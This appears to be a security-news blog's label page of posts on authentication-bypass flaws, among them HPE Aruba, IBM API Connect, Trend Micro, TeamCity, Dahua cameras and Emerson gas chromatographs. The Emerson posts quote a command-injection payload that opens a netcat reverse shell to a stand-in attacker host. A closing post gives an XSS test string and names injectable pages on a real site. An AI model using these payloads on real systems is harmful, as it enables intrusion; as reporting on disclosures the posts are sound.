Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Authentication Bypass. Show all posts
data security
Authentication Bypass authentication bypass flaw Compromised Passwords Cyber Security Cyber Vulnerabilities cybersecurity vulnerabilities data security

HPE Patches Critical Aruba AOS-CX Vulnerabilities Including Authentication Bypass Flaw

 

Hewlett Packard Enterprise (HPE) has released security updates to address multiple vulnerabilities in its Aruba AOS-CX network operating system, including a critical flaw that could allow attackers to bypass authentication and gain administrative control. 

AOS-CX comes from Aruba Networks, a part of HPE, built specifically for cloud-based networking needs. These systems run on CX-series switches found in big company campuses and data centers. Because so many rely on them, any flaws present serious concerns when discovered. 

What stands out is CVE-2026-23813 - a severe flaw tied to how AOS-CX switches handle login security via their web portal. HPE confirms that hackers could abuse this weakness from afar, needing no prior access nor advanced skills. Control over compromised devices might follow, including forced changes to admin credentials. Though simple to trigger, the outcome carries heavy risk. Such exposure emerges solely through network interaction. Little effort may yield full system override. 

Security hinges on timely updates, yet patch details remain sparse. Remote manipulation becomes feasible once entry points open. Without safeguards, unintended access escalates quickly. This condition persists until corrective measures apply. Come mid-advisory, the firm stated they’d seen no signs of real-world attacks nor any public tools built to exploit these flaws. Still, given how serious the weakness happens to be, rolling out fixes quickly becomes a top priority for most teams. 

When updates cannot happen right away, HPE suggests ways to lower exposure. One path involves isolating management ports inside private network zones. Access rules should be tightly defined, minimizing who can connect. Unneeded web-based entry points over HTTP or HTTPS ought to be turned off completely. Trust boundaries may also tighten by using ACLs that allow only known devices to interact. 

Watching system logs closely adds another layer - unexpected login efforts often show up there first. Security weaknesses fit into a wider trend of issues HPE has tackled lately. Back in July 2025, hidden login details emerged in Aruba Instant On wireless units, opening doors for unauthorized access. Before that, fixes rolled out for several problems in the StoreOnce data protection system - some let intruders skip verification steps entirely. Remote control exploits also surfaced, giving hackers potential command over affected machines. 

More recently, the Cybersecurity and Infrastructure Security Agency (CISA) flagged a high-severity vulnerability in HPE OneView as actively exploited in the wild, underscoring the growing focus of threat actors on enterprise infrastructure tools. With more than 55,000 enterprise clients worldwide, HPE points out that timely updates and stronger network defenses help reduce risks. Many of these clients appear on the Fortune 500 list, highlighting the scale of exposure when security lapses occur. Because threats evolve quickly, waiting is rarely an option. 

Instead, consistent maintenance becomes a quiet but steady shield. Even small delays can widen vulnerabilities across complex systems. When flaws appear in network management tools, specialists warn these often pose high risk - attackers might gain extensive access across company systems. Without immediate fixes, even unused weaknesses invite trouble down the line. 

Updates applied quickly, combined with multiple protective layers, help reduce potential harm before incidents occur. When companies depend heavily on unified network systems, events such as these reveal how crucial it is to maintain constant oversight while reacting quickly when new risks appear.
Read more »
Vulnerabilities and Exploits
API connect Authentication Bypass IBM Security Vulnerabilities and Exploits

IBM Issues Critical Alert Over Authentication Bypass Flaw in API Connect Platform



IBM has warned organizations using its API Connect platform about a severe security vulnerability that could allow unauthorized individuals to access applications remotely. The company has urged customers to apply security updates immediately to reduce the risk of exploitation.

API Connect is an enterprise-level platform designed to help organizations create, manage, and secure application programming interfaces, commonly referred to as APIs. APIs act as digital connectors that allow different software systems to communicate securely. Because these interfaces often expose internal services to external applications, business partners, and developers, they play a crucial role in modern digital operations.

IBM API Connect can be deployed in multiple environments, including on-premises infrastructure, cloud-based systems, and hybrid setups. Due to this flexibility, it is widely adopted across industries such as banking, healthcare, retail, and telecommunications, where secure data exchange is essential.

The vulnerability, identified as CVE-2025-13915, has been assigned a severity score of 9.8 out of 10, placing it in the highest risk category. According to IBM, the flaw affects API Connect versions 10.0.11.0 and 10.0.8.0 through 10.0.8.5.

At the core of the issue is a weakness in the platform’s authentication mechanism. Under certain conditions, an attacker could bypass login checks entirely and gain access to exposed applications without providing valid credentials. The attack does not require advanced technical skill or interaction from a legitimate user, which increases the potential risk.

If successfully exploited, this vulnerability could allow threat actors to reach applications that rely on API Connect as a gateway, potentially exposing sensitive systems and data. Given the role of APIs in connecting backend services, such access could have serious operational and security consequences.

IBM has released updated software versions that address the flaw and has strongly recommended that administrators upgrade affected systems as soon as possible. For organizations that are unable to deploy the updates immediately, IBM has outlined temporary mitigation steps. One key recommendation is disabling the self-service sign-up feature on the Developer Portal, which can reduce exposure until a full fix is applied.

The company has also provided detailed guidance for installing the updates across different environments, including VMware, OpenShift Container Platform, and Kubernetes-based deployments.

While IBM has not confirmed active exploitation of this specific vulnerability, U.S. cybersecurity authorities have previously flagged multiple IBM-related security flaws as being abused in real-world attacks. In recent years, several IBM vulnerabilities were added to the U.S. Cybersecurity and Infrastructure Security Agency’s catalog of known exploited vulnerabilities, requiring federal agencies to secure affected systems under Binding Operational Directive 22-01.

Some of those previously listed flaws were later linked to ransomware activity, underscoring the importance of addressing high-severity vulnerabilities promptly.

Security experts advise organizations using API Connect to verify their software versions, apply updates without delay, and monitor systems closely for unusual behavior. As APIs continue to form the backbone of digital services, maintaining strong authentication controls remains critical to reducing cyber risk.



Read more »
Privacy Risks
2FA 2FA security Authentication Authentication Bypass Cyber Security Online Security Privacy Risks

Two-factor authentication complicates security with privacy risks, unreliability, and permanent lockouts

 

Two-factor authentication has become the default standard for online security, showing up everywhere from banking portals to productivity tools. Its purpose is clear: even if someone steals your credentials, they still need a second verification step, usually through an email code, SMS, or an authenticator app. In theory, this additional barrier makes hacking more difficult, but in practice, the burden often falls more heavily on legitimate users than on attackers. For many people, what should be a security measure becomes a frustrating obstacle course, with multiple windows, constant device switching, and codes arriving at the least convenient times. 

The problem lies in balancing protection with usability. While the odds of a random hacker attempting to log in may be low, users are the ones repeatedly forced through verification loops. VPN usage adds to the issue, since changing IP addresses often triggers additional checks. Instead of making accounts safer, the process can feel more like punishment for ordinary login attempts. 

Despite being promoted as a cornerstone of modern cybersecurity, two-factor authentication is only as strong as the delivery method. SMS codes remain widely used, even though SIM swapping is a well-documented threat. Email-based codes can also be problematic—if someone gains access to your primary inbox, they inherit every linked account. Even Big Tech companies sometimes struggle with reliable implementation, with failed code deliveries or inconsistent prompts leaving users stranded. A network outage or downtime at a provider can completely block access to essential services. 

Beyond inconvenience, 2FA introduces hidden privacy and security trade-offs. Every login generates more email or text messages, forcing users to hand over personal phone numbers and email addresses to multiple companies. This not only clutters inboxes but also creates new opportunities for spam or unwanted marketing. Providers like email hosts and carriers gain visibility into user activity, tracking which apps are accessed and when, raising further concerns about surveillance and data use. For users who value a clean inbox and minimal exposure, the system feels invasive rather than protective. 

The most damaging consequence is the risk of permanent lockouts. Losing access to a backup email or phone number can create a cascade of failures that trap users outside critical accounts. Recovery systems, often automated or handled by AI chatbots, provide little flexibility. Some users have experienced losing access entirely because verification codes went to accounts with their own 2FA requirements, resulting in a cycle that cannot be broken. The fallout can disrupt personal, academic, and professional life, with little recourse available. 

While two-factor authentication was designed as an essential layer of defense against account takeovers, its execution often causes more harm than good. Between unreliability, privacy risks, inbox clutter, and the looming threat of irreversible lockouts, the cost of this security tool raises serious questions about whether its benefits truly outweigh the risks.
Read more »
Remote Code Execution
Authentication Bypass CVE CVE exploits CVE vulnerability CVEs Cyber Security cybersecurity vulnerabilities Endpoint patch fixes Remote Code Execution

Trend Micro Patches Critical Remote Code Execution and Authentication Bypass Flaws in Apex Central and PolicyServer

Trend Micro has rolled out essential security updates to address a series of high-impact vulnerabilities discovered in two of its enterprise security solutions: Apex Central and the Endpoint Encryption (TMEE) PolicyServer. These newly disclosed issues, which include critical remote code execution (RCE) and authentication bypass bugs, could allow attackers to compromise systems without needing login credentials. 

Although there have been no confirmed cases of exploitation so far, Trend Micro strongly recommends immediate patching to mitigate any potential threats. The vulnerabilities are especially concerning for organizations operating in sensitive sectors, where data privacy and regulatory compliance are paramount. 

The Endpoint Encryption PolicyServer is a key management solution used to centrally control full disk and media encryption across Windows-based systems. Following the recent update, four critical issues in this product were fixed. Among them is CVE-2025-49212, a remote code execution bug that stems from insecure deserialization within PolicyValue Table Serialization Binder class. This flaw enables threat actors to run code with SYSTEM-level privileges without any authentication. 

Another serious issue, CVE-2025-49213, was found in the PolicyServerWindowsService class, also involving unsafe deserialization. This vulnerability similarly allows arbitrary code execution without requiring user credentials. An additional bug, CVE-2025-49216, enables attackers to bypass authentication entirely due to faulty logic in the DbAppDomain service. Lastly, CVE-2025-49217 presents another RCE risk, though slightly more complex to exploit, allowing code execution via the ValidateToken method. 

While Trend Micro categorized all four as critical, third-party advisory firm ZDI classified CVE-2025-49217 as high-severity. Besides these, the latest PolicyServer release also fixes multiple other high-severity vulnerabilities, such as SQL injection and privilege escalation flaws. The update applies to version 6.0.0.4013 (Patch 1 Update 6), and all earlier versions are affected. Notably, there are no workarounds available, making the patch essential for risk mitigation. 

Trend Micro also addressed separate issues in Apex Central, the company’s centralized console for managing its security tools. Two pre-authentication RCE vulnerabilities—CVE-2025-49219 and CVE-2025-49220—were identified and patched. Both flaws are caused by insecure deserialization and could allow attackers to execute code remotely as NETWORK SERVICE without authentication. 

These Apex Central vulnerabilities were resolved in Patch B7007 for the 2019 on-premise version. Customers using Apex Central as a Service will receive fixes automatically on the backend. 

Given the severity of these cybersecurity vulnerabilities, organizations using these Trend Micro products should prioritize updating their systems to maintain security and operational integrity.
Read more »
sensitive data exposure
Authentication Bypass Command Injection Data Breach denial-of-service conditions Emerson gas chromatographs vulnerabilities sensitive data exposure

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.
Read more »
Remote Code Execution
Authentication Bypass Claroty Team82 critical vulnerabilities Cyber Security Cybersecurity Emerson gas chromatographs Remote Code Execution

Critical Vulnerabilities Found in Emerson Gas Chromographs Expose Systems

 

Multiple critical vulnerabilities have been identified in Emerson gas chromatographs, posing risks such as unauthorized access to sensitive data, denial-of-service conditions, and arbitrary command execution. Gas chromatographs are essential in various industries like chemical, environmental, and healthcare sectors for analyzing and separating chemical compounds. The Emerson Rosemount 370XA, a widely used model, uses a proprietary protocol for communication between the device and a technician's computer.

Security researchers from Claroty's Team82 discovered four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a critical CVSS v3 score of 9.8.

The vulnerability, designated CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command type. It involves a system function that uses a constructed shell command with a user-provided file name without proper sanitization, allowing attackers to inject arbitrary shell commands.

Attackers can exploit this vulnerability by supplying crafted inputs, such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

Another vulnerability, CVE-2023-51761, is an authentication bypass that allows attackers to reset the administrator password by calculating a secret passphrase derived from the device's MAC address. Since the MAC address is not secret and can be easily obtained, attackers can generate the passphrase and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

The vulnerability CVE-2023-49716 involves a user login bypass through a password reset mechanism, enabling an unauthenticated user with network access to gain admin capabilities by bypassing authentication.

The final vulnerability, CVE-2023-43609, involves command injection via reboot functionality, allowing an authenticated user with network access to execute arbitrary commands remotely.

Due to the high cost and difficulty of obtaining a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They identified flaws in the device's protocol implementation, enabling them to craft payloads and uncover the vulnerabilities. For instance, the authentication bypass vulnerability allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

Emerson has issued a security advisory recommending that end users update the firmware on their products. The Cybersecurity and Infrastructure Security Agency has also released an advisory regarding these vulnerabilities.
Read more »
TeamCity
Authentication Bypass Cyber Security JetBrains Server Exploit Supply Chain Attack TeamCity

TeamCity Software Vulnerability Exploited Globally

 


Over the past few days a security breach has transpired, hackers are taking advantage of a significant flaw in TeamCity On-Premises software, allowing them to create unauthorised admin accounts. This flaw, known as CVE-2024-27198, has prompted urgent action from software developer JetBrains, who released an update on March 4 to address the issue.

The gravity of this situation is evident as hackers exploit the vulnerability on an extensive scale, creating hundreds of unauthorised users on instances of TeamCity that have not yet received the essential update. According to LeakIX, a platform specialising in identifying exposed device vulnerabilities, over 1,700 TeamCity servers remain unprotected. Most notably, vulnerable hosts are predominantly found in Germany, the United States, and Russia, with an alarming 1,440 instances already compromised.

On March 5, GreyNoise, a company analysing internet scanning traffic, detected a notable surge in attempts to exploit CVE-2024-27198. The majority of these attempts originated from systems in the United States, particularly those utilising the DigitalOcean hosting infrastructure.

These compromised TeamCity servers are not mere inconveniences; they serve as vital production machines used for building and deploying software. This presents a significant risk of supply-chain attacks, as the compromised servers may contain sensitive information, including crucial credentials for environments where code is deployed, published, or stored.

Rapid7, a prominent cybersecurity company, brought attention to the severity of the situation. The vulnerability, with a critical severity score of 9.8 out of 10, affects all releases up to TeamCity version 2023.11.4. Its nature allows remote, unauthenticated attackers to gain control of a vulnerable server with administrative privileges.

JetBrains responded swiftly to the report by releasing TeamCity version 2023.11.4 on March 4, featuring a fix for CVE-2024-27198. They are urging all TeamCity users to update their instances to the latest version immediately to mitigate the risks associated with this critical vulnerability.

Considering the observed widespread exploitation, administrators of on-premise TeamCity instances are strongly advised to take immediate action in installing the newest release. Failing to do so could leave systems vulnerable to unauthorised access and potential supply-chain attacks, amplifying the urgency of this situation.

The recent discovery of a critical flaw in TeamCity software has far-reaching implications for the global security landscape. Users are urged to act promptly by updating their TeamCity instances to ensure protection against unauthorised access and the looming threat of potential supply-chain attacks. The urgency of this matter cannot be overstated, accentuating the imperative need for immediate action.



Read more »
malware
Android Trojan Authentication Bypass Biometric Security Data Privacy malware

New Chameleon Android Trojan Can Bypass Biometric Security

 

A brand new variant of the Chameleon Android malware has been discovered in the wild, featuring new characteristics, the most notable of which is the ability to bypass fingerprint locks.

The Chameleon Android banking malware first appeared in early 2023, primarily targeting mobile banking apps in Australia and Poland, but it has since propagated to other countries, including the UK and Italy. The trojan employs multiple loggers but has limited functionality. 

Earlier versions of Chameleon could perform actions on the victim's behalf, allowing those behind the malware to carry out account and device takeover attacks. Chameleon has usually leveraged the Android Accessibility Service to extract sensitive data from endpoints and mount overlay attacks, ThreatFabric researchers explained.

The updated version, on the other hand, has two new features: the ability to circumvent biometric prompts and the ability to display an HTML page to allow accessibility service in devices that use Android 13's "Restricted Settings" feature. According to the researchers, the new Chameleon variant's complexity and adaptability have been enhanced, making it a more potent threat in the constantly evolving field of mobile banking trojans. 

The new Chameleon variation starts by determining whether the operating system is Android 13 or newer. If it is, the malware prompts the user to enable accessibility services, even guiding the user through the procedure.Once completed, the malware is able to perform unauthorised acts on the user's behalf. 

While this is a common feature across malware families, what makes this particular aspect intriguing is the ability to disrupt the targeted device's biometric processes and get around fingerprint locks.

The method uses the AccessibilityEvent system-level event for Android and the KeyguardManager application programming interface to determine the screen and keyguard state based on UI changes. Keyguard is an Android system component that controls security features on devices, including screen lock and authentication mechanisms. 

The malware assesses the state of the keyguard in terms of various locking techniques, such as pattern, PIN, or password. When specific requirements are met, the malware will use the AccessibilityEvent action to switch from biometric to PIN authentication. This gets around the biometric question, allowing the trojan to unlock the device whenever it wants. 

The method is believed to offer those behind the malware with two advantages: the ability to simplify the theft of PINs, passwords, or graphical keys by bypassing biometric data via keylogging functionalities, and the ability to open devices using previously acquired PINs or passwords.

“The emergence of the new Chameleon banking trojan is another example of the sophisticated and adaptive threat landscape within the Android ecosystem,” the researchers concluded. “Evolving from its earlier iteration, this variant demonstrates increased resilience and advanced new features.”
Read more »
Vulnerabilities
Authentication Bypass CCTV cameras China Cyber Security Vulnerabilities

Unpatched Dahua Cameras are Prone to Authentication Bypass Vulnerabilities

 

Two authentication bypass vulnerabilities exist in unpatched Dahua cameras, and a proof-of-concept exploit released on 7th October makes the case for upgrading urgent. Both CVE-2021-33044 and CVE-2021-33045 are authentication bypass weaknesses that can be remotely exploited during the login process by sending specially crafted data packets to the target device. 

This comes a month after Dahua issued a security advisory urging owners of vulnerable models to update their firmware, but given how often these devices are forgotten after initial setup and installation, it's possible that many of them are still running an old and vulnerable version. The list of impacted models is long and includes several Dahua cameras, including some thermal cameras. 

IPVM confirmed in 2019 that numerous Dahua cameras had a wiretapping vulnerability, based on tests and information from Dahua. Even if the camera's audio was turned off, an unauthenticated attacker could still listen in. 

An emergency investigation was conducted by the Dahua Security Team and the R&D Team, with the following preliminary findings: 

 • Unauthorized download vulnerability in video chat - This vulnerability no longer exists after code reworking because the relevant functional modules were refactored. Some EOL products would have posed a threat to security.

 • Replay attack vulnerability: This was a newly discovered vulnerability that had affected several Dahua products. 

Dahua spokesperson Tim Shen said, "Dahua uses the secure login authentication method “Digest” by default, but in order to be compatible with early devices, we also retain support for the login authentication method with insufficient security. This vulnerability just exploits these insecure login authentication methods." 

The flaw was initially reported to Dahua in May of 2019. Tenable Research Engineer Jacob Baines discovered a vulnerability within an Amcrest (Dahua OEM) camera's firmware (PoC here, CVE-2019-3948), allowing unauthenticated access to the audio stream. 

The Chinese surveillance camera provider Dahua Technology has been barred from doing business and selling products in the United States since October 2019, when it was added to the US Department of Commerce's 'Entity List.' However, tens of thousands of Dahua cameras are still in use around the country, and some of them may not be readily apparent. Many cameras marketed in the United States under American or Canadian brands use Dahua hardware and even software, according to a new revelation from The Intercept.
Read more »
Security Researchers
Authentication Bypass Cyber Security Microsoft Multi-factor authentication Security Researchers

Kerberos Authentication Spoofing: A Quick Look

 

Since authentication is the first line of defence for security systems, if a threat actor gets past it, they can very much do whatever they want. Threat actors can log in as administrators and change configurations, get access to protected resources, and take control of appliances in order to steal sensitive data. 

Silverfort discovered that all four security systems they examined – Cisco ASA, F5 Big-IP, IBM QRadar, and Palo Alto Networks PAN-OS – were vulnerable to bypass vulnerabilities due to the way they implemented the Kerberos and LDAP authentication protocols. 

Kerberos was first introduced by Microsoft in Windows 2000. It's also become the industry standard for websites and Single-Sign-On implementations on a variety of platforms. Kerberos is an open-source project maintained by the Kerberos Consortium. Microsoft Windows presently uses Kerberos authentication as its default authorization method, and Kerberos implementations are available for Apple OS, FreeBSD, UNIX, and Linux. 

The Kerberos authentication protocol works in the following ways:

 • The client asks the Key Distribution Center (KDC) for an authentication ticket (TGT). 

 • The KDC checks the credentials and returns an encrypted TGT as well as the session key.

 • The Ticket Granting Service (TGS) secret key is used to encrypt the TGT. 

 • When the TGT expires, the client keeps it, and the local session manager requests another TGT (this process is transparent to the user).

Kerberos can be configured without Kerberos' SSO capabilities in the four security systems aforementioned. Instead, when logging in, the user is asked for a username and password, and the system then asks for the TGT. To put it another way, the security system acts as both a client and a server. A KDC spoofing vulnerability might occur if the Client/Server exchange is overlooked. 

The KDC Spoofing vulnerability allows an attacker to overcome Kerberos authentication, break security restrictions, and obtain unrestricted access to sensitive workloads using Big-IP Access Policy Manager (APM). In a report, Silverfort security researchers Yaron Kassner and Rotem Zach discussed it. 

F5 Networks released BIG-IP APM versions 12.1.6, 13.1.4, 14.1.4, and 15.1.3, which included a security patch for this vulnerability (CVE-2021-23008, CVSS score 8.1). Multi-factor authentication (MFA) or an IPSec tunnel between the impacted BIG-IP APM system and the Active Directory servers, was suggested by the company. 
Read more »
Mirai botnet
Authentication Bypass Bug China Cyber Security DDOS Attacks Mirai botnet

12-Year-Old Authentication Bypass Vulnerability Could Allow Network Compromise

 

At least 20 router models have been found to have a 12-year-old authentication bypass vulnerability that might allow attackers to hijack networks and devices, possibly affecting millions of users. The critical path traversal bug was discovered by Evan Grant of Tenable and is tracked as CVE-2021–20090 with a CVSS of 9.8. It can be exploited by unauthenticated, remote attackers. Grant discovered the problem in Buffalo routers, notably the Arcadyan-based web interface software.

Grant discovered that bypass check() only checked as many bytes as there were in the bypass_list strings. Grant was able to circumvent authentication by exploiting this flaw, letting unauthenticated users view pages they shouldn't be able to. Two more vulnerabilities, CVE-2021-20091 and CVE-2021-20092, were discovered, however, they only target specific Buffalo routers at this time. 

According to Grant, this latest revelation raises concerns about the danger of supply chain attacks, which are becoming a more common and serious threat to businesses and technology users. “There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors,” Grant wrote. "Consequently, we were surprised they hadn’t been discovered and fixed by the manufacturer or vendors who are selling affected devices over the past decade." 

On Friday, just three days following the bug's disclosure, Juniper Networks cybersecurity researchers announced that they had detected active exploitation of the bug. “We have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,” they wrote in a post. “The attacker seems to be attempting to deploy a Mirai variant on the affected routers.”

Mirai is a long-running botnet that can be used to launch distributed denial-of-service (DDoS) attacks by infecting linked devices. It first appeared in 2016, when it overloaded Dyn web hosting servers, bringing down over 1,200 websites, including Netflix and Twitter. Its source code was disclosed later that year, prompting the emergence of additional Mirai versions. 

According to Juniper, several of the scripts used in the latest wave of assaults are similar to those used in prior attacks in February and March. “The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,” researchers wrote.
Read more »
XSS Vulnerability
Authentication Bypass Breaking News hacker news SQL Injection Vulnerability Vulnerability XSS Vulnerability

Bollywood Actress Divya Dutta website vulnerable to critical vulnerabilities


Ravi Kariya, a Security Analyst from Cyber Octet Pvt. Ltd (facebook.com/cyberoctet) has discovered critical vulnerabilities in the official website (divyadutta.co.in) of famous Indian Actress Divya Dutta.

There are two SQL Injection vulnerability in the website.  One of the vulnerabilities resides in the  Press Clips page of the site(divyadutta.co.in/pressclipdetail.asp?id=7).  A malicious hacker can exploit this vulnerability and extract the database .

The other one is more critical one , it allows hackers to bypass authentication of the Login .  A malicious hacker can login into the website as admin(divyadutta.co.in/admin/) . This can be done by injecting the crafted password that will modify the sql query such that it allows hacker to login.

There is also Cross site scripting vulnerability in the contact us page(divyadutta.co.in/contact.asp ) .  Injecting the follow code in the fields and clicking the submit button executes the injected code:

"><script>alert('My Love For Divya Dutta')</script>




Ravi tried to contact the Divya dutta via email and Twitter but she fails to respond for his query.  It seems like that She doesn't realize the severity level of this security flaw. A BlackHat hacker is able to deface the site with these vulnerabilities.

I think she will respond after some blackhats attack the site, what do you think guys?

*Update*
After E hacking news published news about the vulnerability, the admin pulled down the divya dutta site. Now the site displays the following error message:

"Directory Listing Denied.This Virtual Directory does not allow contents to be listed."


Read more »
Subscribe to: Comments (Atom)